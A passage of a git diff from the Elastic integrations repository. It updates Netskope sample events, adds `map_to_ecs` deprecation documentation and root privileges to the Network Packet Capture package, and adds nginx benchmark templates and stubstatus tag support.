"169a2d34-f013-46a1-8cfa-0688afe7cb78", - "id": "c0ee214c-57e5-4a60-80ba-e4dc247eb02e", + "ephemeral_id": "c286de6a-2b0b-406e-89e6-ee0d2b13bd2d", + "id": "7b99f48c-6c10-4dad-86c4-ee578beef412", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.9.0" + "version": "8.0.0" }, "data_stream": { "dataset": "netskope.events", @@ -1196,14 +1195,14 @@ An example event for `events` looks as following: "version": "8.11.0" }, "elastic_agent": { - "id": "c0ee214c-57e5-4a60-80ba-e4dc247eb02e", + "id": "7b99f48c-6c10-4dad-86c4-ee578beef412", "snapshot": false, - "version": "8.9.0" + "version": "8.0.0" }, "event": { "agent_id_status": "verified", "dataset": "netskope.events", - "ingested": "2023-07-27T15:55:55Z" + "ingested": "2024-03-29T07:18:17Z" }, "event.id": "613ee55ec9d868fc47654a73", "input": { @@ -1211,7 +1210,7 @@ An example event for `events` looks as following: }, "log": { "source": { - "address": "172.18.0.4:53214" + "address": "192.168.224.6:57252" } }, "netskope": { @@ -1237,5 +1236,4 @@ An example event for `events` looks as following: "netskope-events" ] } - ``` \ No newline at end of file diff --git a/packages/netskope/manifest.yml b/packages/netskope/manifest.yml index d29da8884c8..1a11db082cb 100644 --- a/packages/netskope/manifest.yml +++ b/packages/netskope/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.3" name: netskope title: "Netskope" -version: "1.16.1" +version: "1.18.0" description: Collect logs from Netskope with Elastic Agent. type: integration categories: @@ -9,7 +9,7 @@ categories: - network conditions: kibana: - version: ^7.17.0 || ^8.0.0 + version: ^8.7.0 screenshots: - src: /img/netskope-alerts-screenshot.png title: Netskope Alert logs screenshot diff --git a/packages/network_traffic/_dev/build/docs/README.md b/packages/network_traffic/_dev/build/docs/README.md index e5bd6260639..864980719b3 100644 --- a/packages/network_traffic/_dev/build/docs/README.md +++ b/packages/network_traffic/_dev/build/docs/README.md @@ -33,6 +33,29 @@ Currently, Network Packet Capture supports the following protocols: The following options are available for all protocols: +#### `map_to_ecs` + +Remap any non-ECS Packetbeat fields in root to their correct ECS fields. +This will rename fields that are moved so the fields will not be present +at the root of the document and so any rules that depend on the fields +will need to be updated. + +The legacy behaviour of this option is to not remap to ECS. This behaviour +is still the default, but is deprecated and users are encouraged to set +this option to true. + +ECS remapping may have an impact on workflows that depend on the identity +of non-ECS fields, and users should assess their use of these fields before +making the change. Users who need to retain data collected with the legacy +mappings may need to re-index their older documents. Instructions for doing +this are available [here](https://www.elastic.co/guide/en/elasticsearch/reference/current/docs-reindex.html). +The pipeline used to perform ECS remapping for each data stream can be found +in `Stack Management`›`Ingest Pipelines` and and searching for +"logs-network_traffic compatibility". + +The deprecation and retirement timeline for legacy behavior is available +[here](https://github.com/elastic/integrations/issues/8185). + #### `enabled` The enabled setting is a boolean setting to enable or disable protocols diff --git a/packages/network_traffic/changelog.yml b/packages/network_traffic/changelog.yml index e6a1f1ab0a3..c41824af286 100644 --- a/packages/network_traffic/changelog.yml +++ b/packages/network_traffic/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.30.1" + changes: + - description: capture root requirement + type: enhancement + link: https://github.com/elastic/integrations/issues/8647 +- version: "1.30.0" + changes: + - description: Publish deprecation notice for legacy behavior of `map_to_ecs`. + type: enhancement + link: https://github.com/elastic/integrations/pull/9031 - version: "1.29.1" changes: - description: Changed owners diff --git a/packages/network_traffic/data_stream/amqp/manifest.yml b/packages/network_traffic/data_stream/amqp/manifest.yml index a8721a68253..0bb2d7afa49 100644 --- a/packages/network_traffic/data_stream/amqp/manifest.yml +++ b/packages/network_traffic/data_stream/amqp/manifest.yml @@ -124,7 +124,10 @@ streams: This will rename fields that are moved so the fields will not be present at the root of the document and so any rules that depend on the fields will need to be updated. - show_user: false + + The legacy behaviour of this option is deprecated and users are encouraged + to set this option to true. See details in the [package overview describing `map_to_ecs`](../../../integrations/detail/network_traffic/overview). + show_user: true multi: false required: false title: AMQP diff --git a/packages/network_traffic/data_stream/cassandra/manifest.yml b/packages/network_traffic/data_stream/cassandra/manifest.yml index 9b3554b06fc..7ba1ff6cc6d 100644 --- a/packages/network_traffic/data_stream/cassandra/manifest.yml +++ b/packages/network_traffic/data_stream/cassandra/manifest.yml @@ -111,7 +111,10 @@ streams: This will rename fields that are moved so the fields will not be present at the root of the document and so any rules that depend on the fields will need to be updated. - show_user: false + + The legacy behaviour of this option is deprecated and users are encouraged + to set this option to true. See details in the [package overview describing `map_to_ecs`](../../../integrations/detail/network_traffic/overview). + show_user: true multi: false required: false title: Cassandra diff --git a/packages/network_traffic/data_stream/dhcpv4/manifest.yml b/packages/network_traffic/data_stream/dhcpv4/manifest.yml index 46aea6f0684..1aa7607adf5 100644 --- a/packages/network_traffic/data_stream/dhcpv4/manifest.yml +++ b/packages/network_traffic/data_stream/dhcpv4/manifest.yml @@ -59,7 +59,10 @@ streams: This will rename fields that are moved so the fields will not be present at the root of the document and so any rules that depend on the fields will need to be updated. - show_user: false + + The legacy behaviour of this option is deprecated and users are encouraged + to set this option to true. See details in the [package overview describing `map_to_ecs`](../../../integrations/detail/network_traffic/overview). + show_user: true multi: false required: false title: DHCP diff --git a/packages/network_traffic/data_stream/dns/manifest.yml b/packages/network_traffic/data_stream/dns/manifest.yml index caadb359a66..c8f5a2f50de 100644 --- a/packages/network_traffic/data_stream/dns/manifest.yml +++ b/packages/network_traffic/data_stream/dns/manifest.yml @@ -114,7 +114,10 @@ streams: This will rename fields that are moved so the fields will not be present at the root of the document and so any rules that depend on the fields will need to be updated. - show_user: false + + The legacy behaviour of this option is deprecated and users are encouraged + to set this option to true. See details in the [package overview describing `map_to_ecs`](../../../integrations/detail/network_traffic/overview). + show_user: true multi: false required: false title: DNS diff --git a/packages/network_traffic/data_stream/flow/manifest.yml b/packages/network_traffic/data_stream/flow/manifest.yml index bf4eb4f9bb5..ed73beef964 100644 --- a/packages/network_traffic/data_stream/flow/manifest.yml +++ b/packages/network_traffic/data_stream/flow/manifest.yml @@ -59,6 +59,9 @@ streams: This will rename fields that are moved so the fields will not be present at the root of the document and so any rules that depend on the fields will need to be updated. - show_user: false + + The legacy behaviour of this option is deprecated and users are encouraged + to set this option to true. See details in the [package overview describing `map_to_ecs`](../../../integrations/detail/network_traffic/overview). + show_user: true multi: false required: false diff --git a/packages/network_traffic/data_stream/http/manifest.yml b/packages/network_traffic/data_stream/http/manifest.yml index 708fb50f69a..2ad867128c8 100644 --- a/packages/network_traffic/data_stream/http/manifest.yml +++ b/packages/network_traffic/data_stream/http/manifest.yml @@ -184,7 +184,10 @@ streams: This will rename fields that are moved so the fields will not be present at the root of the document and so any rules that depend on the fields will need to be updated. - show_user: false + + The legacy behaviour of this option is deprecated and users are encouraged + to set this option to true. See details in the [package overview describing `map_to_ecs`](../../../integrations/detail/network_traffic/overview). + show_user: true multi: false required: false title: HTTP diff --git a/packages/network_traffic/data_stream/icmp/manifest.yml b/packages/network_traffic/data_stream/icmp/manifest.yml index 7a258eec387..5476bf1833d 100644 --- a/packages/network_traffic/data_stream/icmp/manifest.yml +++ b/packages/network_traffic/data_stream/icmp/manifest.yml @@ -52,6 +52,9 @@ streams: This will rename fields that are moved so the fields will not be present at the root of the document and so any rules that depend on the fields will need to be updated. - show_user: false + + The legacy behaviour of this option is deprecated and users are encouraged + to set this option to true. See details in the [package overview describing `map_to_ecs`](../../../integrations/detail/network_traffic/overview). + show_user: true multi: false required: false diff --git a/packages/network_traffic/data_stream/memcached/manifest.yml b/packages/network_traffic/data_stream/memcached/manifest.yml index 584822fae63..8bb55cbbbce 100644 --- a/packages/network_traffic/data_stream/memcached/manifest.yml +++ b/packages/network_traffic/data_stream/memcached/manifest.yml @@ -135,7 +135,10 @@ streams: This will rename fields that are moved so the fields will not be present at the root of the document and so any rules that depend on the fields will need to be updated. - show_user: false + + The legacy behaviour of this option is deprecated and users are encouraged + to set this option to true. See details in the [package overview describing `map_to_ecs`](../../../integrations/detail/network_traffic/overview). + show_user: true multi: false required: false title: Memcached diff --git a/packages/network_traffic/data_stream/mongodb/manifest.yml b/packages/network_traffic/data_stream/mongodb/manifest.yml index 66ba27d1b2b..0ac427c7089 100644 --- a/packages/network_traffic/data_stream/mongodb/manifest.yml +++ b/packages/network_traffic/data_stream/mongodb/manifest.yml @@ -105,7 +105,10 @@ streams: This will rename fields that are moved so the fields will not be present at the root of the document and so any rules that depend on the fields will need to be updated. - show_user: false + + The legacy behaviour of this option is deprecated and users are encouraged + to set this option to true. See details in the [package overview describing `map_to_ecs`](../../../integrations/detail/network_traffic/overview). + show_user: true multi: false required: false title: MongoDB diff --git a/packages/network_traffic/data_stream/mysql/manifest.yml b/packages/network_traffic/data_stream/mysql/manifest.yml index b2ad8e537c4..e6de4480a9b 100644 --- a/packages/network_traffic/data_stream/mysql/manifest.yml +++ b/packages/network_traffic/data_stream/mysql/manifest.yml @@ -86,7 +86,10 @@ streams: This will rename fields that are moved so the fields will not be present at the root of the document and so any rules that depend on the fields will need to be updated. - show_user: false + + The legacy behaviour of this option is deprecated and users are encouraged + to set this option to true. See details in the [package overview describing `map_to_ecs`](../../../integrations/detail/network_traffic/overview). + show_user: true multi: false required: false title: MySQL diff --git a/packages/network_traffic/data_stream/nfs/manifest.yml b/packages/network_traffic/data_stream/nfs/manifest.yml index 97692125db2..279a6783ba6 100644 --- a/packages/network_traffic/data_stream/nfs/manifest.yml +++ b/packages/network_traffic/data_stream/nfs/manifest.yml @@ -86,7 +86,10 @@ streams: This will rename fields that are moved so the fields will not be present at the root of the document and so any rules that depend on the fields will need to be updated. - show_user: false + + The legacy behaviour of this option is deprecated and users are encouraged + to set this option to true. See details in the [package overview describing `map_to_ecs`](../../../integrations/detail/network_traffic/overview). + show_user: true multi: false required: false title: NFS diff --git a/packages/network_traffic/data_stream/pgsql/manifest.yml b/packages/network_traffic/data_stream/pgsql/manifest.yml index 242081c33b7..4d03ad0cdb8 100644 --- a/packages/network_traffic/data_stream/pgsql/manifest.yml +++ b/packages/network_traffic/data_stream/pgsql/manifest.yml @@ -86,7 +86,10 @@ streams: This will rename fields that are moved so the fields will not be present at the root of the document and so any rules that depend on the fields will need to be updated. - show_user: false + + The legacy behaviour of this option is deprecated and users are encouraged + to set this option to true. See details in the [package overview describing `map_to_ecs`](../../../integrations/detail/network_traffic/overview). + show_user: true multi: false required: false title: PostgreSQL diff --git a/packages/network_traffic/data_stream/redis/manifest.yml b/packages/network_traffic/data_stream/redis/manifest.yml index be1e895849f..b8d8042e004 100644 --- a/packages/network_traffic/data_stream/redis/manifest.yml +++ b/packages/network_traffic/data_stream/redis/manifest.yml @@ -105,7 +105,10 @@ streams: This will rename fields that are moved so the fields will not be present at the root of the document and so any rules that depend on the fields will need to be updated. - show_user: false + + The legacy behaviour of this option is deprecated and users are encouraged + to set this option to true. See details in the [package overview describing `map_to_ecs`](../../../integrations/detail/network_traffic/overview). + show_user: true multi: false required: false title: Redis diff --git a/packages/network_traffic/data_stream/sip/manifest.yml b/packages/network_traffic/data_stream/sip/manifest.yml index 58f8f685d8f..d465123ed08 100644 --- a/packages/network_traffic/data_stream/sip/manifest.yml +++ b/packages/network_traffic/data_stream/sip/manifest.yml @@ -80,7 +80,10 @@ streams: This will rename fields that are moved so the fields will not be present at the root of the document and so any rules that depend on the fields will need to be updated. - show_user: false + + The legacy behaviour of this option is deprecated and users are encouraged + to set this option to true. See details in the [package overview describing `map_to_ecs`](../../../integrations/detail/network_traffic/overview). + show_user: true multi: false required: false title: SIP diff --git a/packages/network_traffic/data_stream/thrift/manifest.yml b/packages/network_traffic/data_stream/thrift/manifest.yml index b0d8cbc3b39..e233a99a875 100644 --- a/packages/network_traffic/data_stream/thrift/manifest.yml +++ b/packages/network_traffic/data_stream/thrift/manifest.yml @@ -160,7 +160,10 @@ streams: This will rename fields that are moved so the fields will not be present at the root of the document and so any rules that depend on the fields will need to be updated. - show_user: false + + The legacy behaviour of this option is deprecated and users are encouraged + to set this option to true. See details in the [package overview describing `map_to_ecs`](../../../integrations/detail/network_traffic/overview). + show_user: true multi: false required: false title: Thrift diff --git a/packages/network_traffic/data_stream/tls/manifest.yml b/packages/network_traffic/data_stream/tls/manifest.yml index 749518b66d1..4eaebadfca0 100644 --- a/packages/network_traffic/data_stream/tls/manifest.yml +++ b/packages/network_traffic/data_stream/tls/manifest.yml @@ -86,7 +86,10 @@ streams: This will rename fields that are moved so the fields will not be present at the root of the document and so any rules that depend on the fields will need to be updated. - show_user: false + + The legacy behaviour of this option is deprecated and users are encouraged + to set this option to true. See details in the [package overview describing `map_to_ecs`](../../../integrations/detail/network_traffic/overview). + show_user: true multi: false required: false title: TLS diff --git a/packages/network_traffic/docs/README.md b/packages/network_traffic/docs/README.md index 304c1261b2b..da835c26c57 100644 --- a/packages/network_traffic/docs/README.md +++ b/packages/network_traffic/docs/README.md @@ -33,6 +33,29 @@ Currently, Network Packet Capture supports the following protocols: The following options are available for all protocols: +#### `map_to_ecs` + +Remap any non-ECS Packetbeat fields in root to their correct ECS fields. +This will rename fields that are moved so the fields will not be present +at the root of the document and so any rules that depend on the fields +will need to be updated. + +The legacy behaviour of this option is to not remap to ECS. This behaviour +is still the default, but is deprecated and users are encouraged to set +this option to true. + +ECS remapping may have an impact on workflows that depend on the identity +of non-ECS fields, and users should assess their use of these fields before +making the change. Users who need to retain data collected with the legacy +mappings may need to re-index their older documents. Instructions for doing +this are available [here](https://www.elastic.co/guide/en/elasticsearch/reference/current/docs-reindex.html). +The pipeline used to perform ECS remapping for each data stream can be found +in `Stack Management`›`Ingest Pipelines` and and searching for +"logs-network_traffic compatibility". + +The deprecation and retirement timeline for legacy behavior is available +[here](https://github.com/elastic/integrations/issues/8185). + #### `enabled` The enabled setting is a boolean setting to enable or disable protocols diff --git a/packages/network_traffic/manifest.yml b/packages/network_traffic/manifest.yml index f3679ee44f2..c7445f38d19 100644 --- a/packages/network_traffic/manifest.yml +++ b/packages/network_traffic/manifest.yml @@ -1,7 +1,7 @@ format_version: "3.0.0" name: network_traffic title: Network Packet Capture -version: "1.29.1" +version: "1.30.1" description: Capture and analyze network traffic from a host with Elastic Agent. type: integration categories: @@ -40,6 +40,9 @@ policy_templates: required: false show_user: false default: false +agent: + privileges: + root: true owner: github: elastic/sec-linux-platform type: elastic diff --git a/packages/nginx/_dev/benchmark/rally/access-benchmark.yml b/packages/nginx/_dev/benchmark/rally/access-benchmark.yml new file mode 100644 index 00000000000..371dc013ab8 --- /dev/null +++ b/packages/nginx/_dev/benchmark/rally/access-benchmark.yml @@ -0,0 +1,14 @@ +--- +description: Benchmark 20000 nginx.access events ingested +data_stream: + name: access +corpora: + generator: + total_events: 20000 + template: + type: gotext + path: ./access-benchmark/template.ndjson + config: + path: ./access-benchmark/config.yml + fields: + path: ./access-benchmark/fields.yml diff --git a/packages/nginx/_dev/benchmark/rally/access-benchmark/config.yml b/packages/nginx/_dev/benchmark/rally/access-benchmark/config.yml new file mode 100644 index 00000000000..7145fd28d6c --- /dev/null +++ b/packages/nginx/_dev/benchmark/rally/access-benchmark/config.yml @@ -0,0 +1,17 @@ +fields: + - name: 'timestamp' + period: -24h # one day + - name: agent.id + value: "ef5e274d-4b53-45e6-943a-a5bcf1a6f523" + - name: request_method + enum: ["GET", "POST", "PUT", "DELETE"] + - name: status_code + enum: ["101", "102", "200", "201", "202", "300", "301", "302", "400", "401", "402", "500", "501"] + - name: response_bytes + range: + min: 100 + max: 30000 + - name: id + enum: ["1", "2", "3"] + - name: domains + enum: [".com", ".net", ".info", ".org"] diff --git a/packages/nginx/_dev/benchmark/rally/access-benchmark/fields.yml b/packages/nginx/_dev/benchmark/rally/access-benchmark/fields.yml new file mode 100644 index 00000000000..d06f16fd934 --- /dev/null +++ b/packages/nginx/_dev/benchmark/rally/access-benchmark/fields.yml @@ -0,0 +1,25 @@ +- name: agent.ephemeral_id + type: keyword +- name: agent.id + type: keyword +- name: agent.name + type: keyword +- name: destination_domain + type: keyword + example: lessons.example +- name: domains + type: keyword +- name: remote_ip + type: ip +- name: timestamp + type: date +- name: request_method + type: keyword +- name: status_code + type: keyword +- name: response_bytes + type: long +- name: remote_user + type: keyword +- name: id + type: keyword diff --git a/packages/nginx/_dev/benchmark/rally/access-benchmark/template.ndjson b/packages/nginx/_dev/benchmark/rally/access-benchmark/template.ndjson new file mode 100644 index 00000000000..80322c2f0fa --- /dev/null +++ b/packages/nginx/_dev/benchmark/rally/access-benchmark/template.ndjson @@ -0,0 +1,75 @@ +{{- $timestamp := generate "timestamp" }} +{{- $agentId := generate "agent.id" }} +{{- $agentName := generate "agent.name" }} +{{- $agentEphemeralid := generate "agent.ephemeral_id" }} +{{- $destinationDomain := generate "destination_domain" }} +{{- $remoteIp := generate "remote_ip" }} +{{- $remoteUser := generate "remote_user" }} +{{- $requestMethod := generate "request_method" }} +{{- $statusCode := generate "status_code" }} +{{- $responseBytes := generate "response_bytes" }} +{{- $domains := generate "domains" }} +{{- $id := generate "id" }} +{ + "@timestamp": "{{ $timestamp.Format "2006-01-02T15:04:05.000Z07:00" }}", + "agent": { + "ephemeral_id": "{{ $agentEphemeralid }}", + "id": "{{ $agentId }}", + "name": "{{ $agentName }}", + "type": "filebeat", + "version": "8.5.1" + }, + "data_stream": { + "dataset": "nginx.access", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.5.1" + }, + "elastic_agent": { + "id": "{{ $agentId }}", + "snapshot": false, + "version": "8.5.0" + }, + "message": "{{ $destinationDomain }}{{ $domains }}:80 {{ $remoteIp }} - {{ $remoteUser }} [{{$timestamp | date "02/Jan/2006:15:04:05"}} {{ $timestamp.Format "Z0700" }}] \"{{$requestMethod}} /downloads/product_{{ $id }} HTTP/1.1\" {{ $statusCode }} {{ $responseBytes }} \"http://localhost:8080/\" \"Chef Client/12.0.3 (ruby-2.1.4-p265; ohai-8.0.1; x86_64-linux; +http://opscode.com)\"", + "event": { + "agent_id_status": "verified", + "dataset": "nginx.access", + "timezone": "{{ $timestamp.Format "-07:00" }}" + }, + "host": { + "architecture": "x86_64", + "containerized": false, + "hostname": "docker-fleet-agent", + "id": "66392b0697b84641af8006d87aeb89f1", + "ip": [ + "172.18.0.7" + ], + "mac": [ + "02-42-AC-12-00-07" + ], + "name": "docker-fleet-agent", + "os": { + "codename": "focal", + "family": "debian", + "kernel": "5.15.49-linuxkit", + "name": "Ubuntu", + "platform": "ubuntu", + "type": "linux", + "version": "20.04.5 LTS (Focal Fossa)" + } + }, + "input": { + "type": "log" + }, + "log": { + "file": { + "path": "/tmp/service_logs/access.log" + }, + "offset": 0 + }, + "tags": [ + "nginx-access" + ] +} \ No newline at end of file diff --git a/packages/nginx/_dev/benchmark/rally/error-benchmark/config.yml b/packages/nginx/_dev/benchmark/rally/error-benchmark/config.yml index 1ccf19deb89..70472b8a4e4 100644 --- a/packages/nginx/_dev/benchmark/rally/error-benchmark/config.yml +++ b/packages/nginx/_dev/benchmark/rally/error-benchmark/config.yml @@ -17,3 +17,18 @@ fields: range: min: 1 max: 100000 + - name: request.method + enum: ["POST", "GET", "PUT", "DELETE"] + - name: request.path + enum: + - "/favicon.ico" + - "/index.html" + - "/foo/bar.php" + - name: referer.host.name + enum: + - "localhost" + - "google.com" + - name: host.name + enum: + - "localhost" + - "elastic.co" \ No newline at end of file diff --git a/packages/nginx/_dev/benchmark/rally/error-benchmark/fields.yml b/packages/nginx/_dev/benchmark/rally/error-benchmark/fields.yml index 990f7d91ace..dc271723bec 100644 --- a/packages/nginx/_dev/benchmark/rally/error-benchmark/fields.yml +++ b/packages/nginx/_dev/benchmark/rally/error-benchmark/fields.yml @@ -1,5 +1,3 @@ -- name: agent.ephemeral_id - type: keyword - name: agent.ephemeral_id type: keyword - name: agent.id @@ -8,8 +6,6 @@ type: keyword - name: agent.version type: keyword -- name: agent.version - type: keyword - name: connection_id type: long - name: host.ip @@ -26,3 +22,9 @@ type: long - name: timestamp type: date +- name: request.method + type: keyword +- name: request.path + type: keyword +- name: referer.host.name + type: keyword \ No newline at end of file diff --git a/packages/nginx/_dev/benchmark/rally/error-benchmark/template.ndjson b/packages/nginx/_dev/benchmark/rally/error-benchmark/template.ndjson index b8e9abf98fa..57f705c9c5a 100644 --- a/packages/nginx/_dev/benchmark/rally/error-benchmark/template.ndjson +++ b/packages/nginx/_dev/benchmark/rally/error-benchmark/template.ndjson @@ -7,6 +7,7 @@ {{- $pid := generate "process.pid" }} {{- $threadId := generate "thread.id" }} {{- $connectionId := generate "connection_id" }} +{{- $requestPath := generate "request.path" }} { "@timestamp": "{{ $timestamp.Format "2006-01-02T15:04:05.000Z" }}", "agent": { @@ -65,7 +66,7 @@ }, "offset": 0 }, - "message": "{{$timestamp.Format "2006/01/02 15:04:05"}} [{{ $logLevel }}] {{ $pid }}#{{ $threadId }}: *{{ $connectionId }} {{generate "message"}}", + "message": "{{$timestamp.Format "2006/01/02 15:04:05"}} [{{ $logLevel }}] {{ $pid }}#{{ $threadId }}: *{{ $connectionId }} open() \"/usr/local/Cellar/nginx/1.10.2_1/html{{ $requestPath }}\" failed (2: No such file or directory), client: 127.0.0.1, server: localhost, request: \"{{ generate "request.method" }} {{ $requestPath }} HTTP/1.1\", host: \"{{ generate "host.name" }}:8080\", referrer: \"http://{{ generate "referer.host.name" }}:8080/\"", "tags": [ "nginx-error" ] diff --git a/packages/nginx/_dev/benchmark/rally/stubstatus-benchmark/config.yml b/packages/nginx/_dev/benchmark/rally/stubstatus-benchmark/config.yml index 7348b24a08e..2990d6b9823 100644 --- a/packages/nginx/_dev/benchmark/rally/stubstatus-benchmark/config.yml +++ b/packages/nginx/_dev/benchmark/rally/stubstatus-benchmark/config.yml @@ -4,7 +4,7 @@ fields: - name: agent.id value: "ef5e274d-4b53-45e6-943a-a5bcf1a6f523" - name: service.address - enum: ["elastic-package-service-nginx-1","elastic-package-service-nginx-2","elastic-package-service-nginx-3"] + enum: ["elastic-package-service-nginx-1", "elastic-package-service-nginx-2", "elastic-package-service-nginx-3"] - name: event.duration range: min: 1 diff --git a/packages/nginx/changelog.yml b/packages/nginx/changelog.yml index 8f66e0b92e5..8352e20b32a 100644 --- a/packages/nginx/changelog.yml +++ b/packages/nginx/changelog.yml @@ -1,4 +1,24 @@ # newer versions go on top +- version: "1.20.0" + changes: + - description: Enable secrets for sensitive fields. For more details, refer https://www.elastic.co/guide/en/fleet/current/agent-policy.html#agent-policy-secret-values + type: enhancement + link: https://github.com/elastic/integrations/pull/9321 +- version: "1.19.1" + changes: + - description: Disable secrets for older stack versions due to errors. + type: bugfix + link: https://github.com/elastic/integrations/pull/9279 +- version: "1.19.0" + changes: + - description: Add support for tags in stub status metrics + type: enhancement + link: https://github.com/elastic/integrations/pull/9081 +- version: "1.18.0" + changes: + - description: Enable 'secret' for the sensitive fields, supported from 8.12. + type: enhancement + link: https://github.com/elastic/integrations/pull/9009 - version: "1.17.0" changes: - description: Limit request tracer log count to five. diff --git a/packages/nginx/data_stream/stubstatus/agent/stream/stream.yml.hbs b/packages/nginx/data_stream/stubstatus/agent/stream/stream.yml.hbs index 18aabf7beea..3d50416047f 100644 --- a/packages/nginx/data_stream/stubstatus/agent/stream/stream.yml.hbs +++ b/packages/nginx/data_stream/stubstatus/agent/stream/stream.yml.hbs @@ -3,6 +3,10 @@ hosts: {{#each hosts}} - {{this}} {{/each}} +tags: +{{#each tags as |tag i|}} + - {{tag}} +{{/each}} period: {{period}} {{#if server_status_path}} server_status_path: {{server_status_path}} diff --git a/packages/nginx/data_stream/stubstatus/fields/ecs.yml b/packages/nginx/data_stream/stubstatus/fields/ecs.yml index d7ea22de8d6..83ee31e5e9a 100644 --- a/packages/nginx/data_stream/stubstatus/fields/ecs.yml +++ b/packages/nginx/data_stream/stubstatus/fields/ecs.yml @@ -7,3 +7,5 @@ dimension: true - external: ecs name: service.type +- external: ecs + name: tags diff --git a/packages/nginx/data_stream/stubstatus/manifest.yml b/packages/nginx/data_stream/stubstatus/manifest.yml index bef7fe98c0a..1ae62ee17c1 100644 --- a/packages/nginx/data_stream/stubstatus/manifest.yml +++ b/packages/nginx/data_stream/stubstatus/manifest.yml @@ -17,6 +17,14 @@ streams: required: true show_user: false default: /nginx_status + - name: tags + type: text + title: Tags + multi: true + required: false + show_user: false + default: + - nginx-stubstatus title: Nginx stub status metrics description: Collect Nginx stub status metrics elasticsearch: diff --git a/packages/nginx/data_stream/stubstatus/sample_event.json b/packages/nginx/data_stream/stubstatus/sample_event.json index 49e012902af..ca314bad0f8 100644 --- a/packages/nginx/data_stream/stubstatus/sample_event.json +++ b/packages/nginx/data_stream/stubstatus/sample_event.json @@ -1,11 +1,11 @@ { - "@timestamp": "2022-12-09T10:41:07.200Z", + "@timestamp": "2024-02-08T08:12:10.668Z", "agent": { - "ephemeral_id": "83392432-3db0-4ae9-98f1-342339cf935c", - "id": "ef5e274d-4b53-45e6-943a-a5bcf1a6f523", + "ephemeral_id": "c3d516ba-b659-4190-a29d-d28200d74d48", + "id": "2ea50bee-9250-43d1-8d70-949f242aa275", "name": "docker-fleet-agent", "type": "metricbeat", - "version": "8.5.0" + "version": "8.10.1" }, "data_stream": { "dataset": "nginx.stubstatus", @@ -13,40 +13,38 @@ "type": "metrics" }, "ecs": { - "version": "8.5.1" + "version": "8.0.0" }, "elastic_agent": { - "id": "ef5e274d-4b53-45e6-943a-a5bcf1a6f523", + "id": "2ea50bee-9250-43d1-8d70-949f242aa275", "snapshot": false, - "version": "8.5.0" + "version": "8.10.1" }, "event": { "agent_id_status": "verified", "dataset": "nginx.stubstatus", - "duration": 4340916, - "ingested": "2022-12-09T10:41:08Z", + "duration": 1156104, + "ingested": "2024-02-08T08:12:13Z", "module": "nginx" }, "host": { "architecture": "x86_64", "containerized": false, "hostname": "docker-fleet-agent", - "id": "66392b0697b84641af8006d87aeb89f1", + "id": "28da52b32df94b50aff67dfb8f1be3d6", "ip": [ - "172.18.0.7" - ], - "mac": [ - "02-42-AC-12-00-07" + "172.24.0.7" ], + "mac": "02-42-AC-18-00-07", "name": "docker-fleet-agent", "os": { "codename": "focal", "family": "debian", - "kernel": "5.15.49-linuxkit", + "kernel": "5.15.0-89-generic", "name": "Ubuntu", "platform": "ubuntu", "type": "linux", - "version": "20.04.5 LTS (Focal Fossa)" + "version": "20.04.6 LTS (Focal Fossa)" } }, "metricset": { @@ -55,14 +53,14 @@ }, "nginx": { "stubstatus": { - "accepts": 15, + "accepts": 33, "active": 1, - "current": 15, + "current": 33, "dropped": 0, - "handled": 15, + "handled": 33, "hostname": "elastic-package-service-nginx-1:80", "reading": 0, - "requests": 15, + "requests": 33, "waiting": 0, "writing": 1 } @@ -70,5 +68,8 @@ "service": { "address": "http://elastic-package-service-nginx-1:80/server-status", "type": "nginx" - } + }, + "tags": [ + "nginx-stubstatus" + ] } \ No newline at end of file diff --git a/packages/nginx/docs/README.md b/packages/nginx/docs/README.md index 9b3b3ccaf19..0ca72ca918a 100644 --- a/packages/nginx/docs/README.md +++ b/packages/nginx/docs/README.md @@ -439,13 +439,13 @@ An example event for `stubstatus` looks as following: ```json { - "@timestamp": "2022-12-09T10:41:07.200Z", + "@timestamp": "2024-02-08T08:12:10.668Z", "agent": { - "ephemeral_id": "83392432-3db0-4ae9-98f1-342339cf935c", - "id": "ef5e274d-4b53-45e6-943a-a5bcf1a6f523", + "ephemeral_id": "c3d516ba-b659-4190-a29d-d28200d74d48", + "id": "2ea50bee-9250-43d1-8d70-949f242aa275", "name": "docker-fleet-agent", "type": "metricbeat", - "version": "8.5.0" + "version": "8.10.1" }, "data_stream": { "dataset": "nginx.stubstatus", @@ -453,40 +453,38 @@ An example event for `stubstatus` looks as following: "type": "metrics" }, "ecs": { - "version": "8.5.1" + "version": "8.0.0" }, "elastic_agent": { - "id": "ef5e274d-4b53-45e6-943a-a5bcf1a6f523", + "id": "2ea50bee-9250-43d1-8d70-949f242aa275", "snapshot": false, - "version": "8.5.0" + "version": "8.10.1" }, "event": { "agent_id_status": "verified", "dataset": "nginx.stubstatus", - "duration": 4340916, - "ingested": "2022-12-09T10:41:08Z", + "duration": 1156104, + "ingested": "2024-02-08T08:12:13Z", "module": "nginx" }, "host": { "architecture": "x86_64", "containerized": false, "hostname": "docker-fleet-agent", - "id": "66392b0697b84641af8006d87aeb89f1", + "id": "28da52b32df94b50aff67dfb8f1be3d6", "ip": [ - "172.18.0.7" - ], - "mac": [ - "02-42-AC-12-00-07" + "172.24.0.7" ], + "mac": "02-42-AC-18-00-07", "name": "docker-fleet-agent", "os": { "codename": "focal", "family": "debian", - "kernel": "5.15.49-linuxkit", + "kernel": "5.15.0-89-generic", "name": "Ubuntu", "platform": "ubuntu", "type": "linux", - "version": "20.04.5 LTS (Focal Fossa)" + "version": "20.04.6 LTS (Focal Fossa)" } }, "metricset": { @@ -495,14 +493,14 @@ An example event for `stubstatus` looks as following: }, "nginx": { "stubstatus": { - "accepts": 15, + "accepts": 33, "active": 1, - "current": 15, + "current": 33, "dropped": 0, - "handled": 15, + "handled": 33, "hostname": "elastic-package-service-nginx-1:80", "reading": 0, - "requests": 15, + "requests": 33, "waiting": 0, "writing": 1 } @@ -510,7 +508,10 @@ An example event for `stubstatus` looks as following: "service": { "address": "http://elastic-package-service-nginx-1:80/server-status", "type": "nginx" - } + }, + "tags": [ + "nginx-stubstatus" + ] } ``` @@ -568,6 +569,7 @@ An example event for `stubstatus` looks as following: | nginx.stubstatus.writing | The current number of connections where Nginx is writing the response back to the client. | long | gauge | | service.address | Address where data about this service was collected from. This should be a URI, network address 